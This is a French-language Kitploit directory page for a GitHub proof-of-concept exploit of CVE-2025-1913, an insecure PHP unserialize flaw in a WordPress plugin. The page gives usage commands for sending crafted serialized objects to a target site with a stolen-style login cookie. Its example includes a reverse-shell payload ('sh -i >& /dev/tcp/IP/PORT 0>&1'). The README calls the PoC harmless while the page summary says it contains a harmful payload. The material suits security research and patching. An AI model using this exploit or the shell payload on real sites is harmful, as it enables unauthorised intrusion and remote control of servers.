Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-1913-PoC — Un PoC démontrant CVE-2025-1913, montrant comment la gestion non sécurisée de `unserialize` du plugin peut conduire à un comportement à fort impact dans des environnements contrôlés. Contient une charge utile nuisible réservée aux tests autorisés uniquement. À utiliser strictement dans des laboratoires isolés et pour la recherche défensive. | Kitploit
Outils/GitHubGitHub/s0haib518-ksa/cve-2025-1913-poc
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebApprentissage et ÉducationLabs et Pratique
GitHubs0haib518-ksa/cve-2025-1913-poc

CVE-2025-1913-PoC

Voir le dépôt
21il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Un PoC démontrant CVE-2025-1913, montrant comment la gestion non sécurisée de `unserialize` du plugin peut conduire à un comportement à fort impact dans des environnements contrôlés. Contient une charge utile nuisible réservée aux tests autorisés uniquement. À utiliser strictement dans des laboratoires isolés et pour la recherche défensive.

Partager

CVE-2025-1913 -- Preuve de Concept (PoC)

Ce dépôt contient une Preuve de Concept (PoC) strictement éducative pour CVE-2025-1913, créée par Suhaib518 🇸🇦. Cette PoC démontre comment des entrées PHP sérialisées spécialement conçues peuvent déclencher une logique vulnérable dans des composants WordPress affectés. La PoC est sûre et ne contient pas de charges utiles nuisibles.

⚠️ Avertissement : Cette PoC est destinée uniquement à l'apprentissage, la recherche et les tests de sécurité défensifs. Ne l'utilisez PAS sur des serveurs que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation explicite de tester.


📌 Aperçu

La vulnérabilité existe en raison d'une gestion non sécurisée des données sérialisées PHP dans certains workflows de plugins WordPress. Cette PoC montre comment un attaquant pourrait fournir des structures sérialisées artificielles qui provoquent un comportement interne non souhaité.

Ce dépôt inclut un script Python qui :

  • Construit des objets PHP sérialisés personnalisés
  • Les encode pour les points de terminaison d'exportation AJAX de WordPress
  • Envoie une requête contrôlée pour démontrer le problème en toute sécurité

📂 Fichiers dans ce dépôt

root@kitploit:~
.
├── CVE-2025-1913-PoC.py         # Le script PoC créé par Suhaib518 KSA
└── README.md                    # Documentation

🚀 Utilisation

1. Installer les prérequis

Le script utilise uniquement des modules Python intégrés à l'exception de requests :

root@kitploit:~
pip install requests

2. Exécuter le script d'exploitation interactif

root@kitploit:~
python3 exploit.py \
  -c "Class" \
  -H "https://target.com" \
  --wp-nonce "1234567890" \
  --cookie "wordpress_logged_in=YOUR_COOKIE_HERE"

Il vous sera demandé :

  • Combien de propriétés inclure
  • Le nom/la valeur de chaque propriété

Le script les sérialisera ensuite, construira une requête WordPress et l'enverra.


✔️ Exemple de commande (Flux d'exploitation réussi)

Ci-dessous un exemple de commande illustrant l'utilisation avec des valeurs d'exemple (elles ne sont pas malveillantes, montrent simplement le processus) :

root@kitploit:~
python3 exploit.py   -c "WP_User_Query"   -H "https://example.com"   --wp-nonce "89f1a2b3c4"   --cookie "wordpress_logged_in_abc123=abcd1234efgh5678"

Exemples de réponses aux questions interactives :

root@kitploit:~
[?] Combien de propriétés cette classe a-t-elle ? 2
[?] Nom de la propriété #1 : file
[?] Valeur pour 'file' : shell.sh
[?] Nom de la propriété #2 : shell
[?] Valeur pour 'shell' : sh -i >& /dev/tcp/IP/PORT 0>&1

Le script affichera alors :

root@kitploit:~
[*] Envoi de la requête…
....Vérifiez l'écouteur pour le shell.

🛡️ Atténuation (Haut niveau)

  • Évitez d'utiliser unserialize() sur des entrées non fiables
  • Validez tous les paramètres de formulaire et les requêtes AJAX
  • Maintenez les plugins à jour
  • Utilisez des formats de données modernes comme JSON au lieu de la sérialisation PHP

📜 Licence

Licence MIT.


🙌 Auteur

Créé par Suhaib518 🇸🇦.

Télécharger l’outil